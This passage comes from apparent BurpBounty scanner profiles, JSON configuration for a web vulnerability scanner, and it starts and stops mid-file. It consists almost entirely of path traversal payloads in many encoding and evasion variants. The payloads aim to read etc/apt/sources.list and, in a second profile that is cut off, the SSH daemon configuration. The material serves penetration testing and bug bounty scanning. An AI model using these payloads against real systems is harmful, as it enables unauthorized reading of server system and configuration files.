"true,0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
"true,0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
"true,..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
"true,%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
"true,%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
"true,..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
"true,%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
"true,%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
"true,///%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,\\\\\\%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..//{FILE}",
"true,..//..//{FILE}",
"true,..//..//..//{FILE}",
"true,..//..//..//..//{FILE}",
"true,..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//..//{FILE}",
"true,..///{FILE}",
"true,..///..///{FILE}",
"true,..///..///..///{FILE}",
"true,..///..///..///..///{FILE}",
"true,..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///..///{FILE}",
"true,..\\\\{FILE}",
"true,..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,./\\/./{FILE}",
"true,./\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,./../{FILE}",
"true,./.././../{FILE}",
"true,./.././.././../{FILE}",
"true,./.././.././.././../{FILE}",
"true,./.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././.././../{FILE}",
"true,.\\..\\{FILE}",
"true,.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.//..//{FILE}",
"true,.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,../{FILE}",
"true,../..//{FILE}",
"true,../..//../{FILE}",
"true,../..//../..//{FILE}",
"true,../..//../..//../{FILE}",
"true,../..//../..//../..//{FILE}",
"true,../..//../..//../..//../{FILE}",
"true,../..//../..//../..//../..//{FILE}",
"true,..\\{FILE}",
"true,..\\..\\\\{FILE}",
"true,..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..///{FILE}",
"true,../..///{FILE}",
"true,../..//..///{FILE}",
"true,../..//../..///{FILE}",
"true,../..//../..//..///{FILE}",
"true,../..//../..//../..///{FILE}",
"true,../..//../..//../..//..///{FILE}",
"true,../..//../..//../..//../..///{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,deb http"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Linux-source-list",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Linux-source-list",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{FILE}",
"replace": "etc/apt/sources.list",
"regex": "String"
}
],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Linux-sshd-conf.bb | [
{
"ProfileName": "Linux-sshd-conf",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@Sy3Omda",
"Payloads": [
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
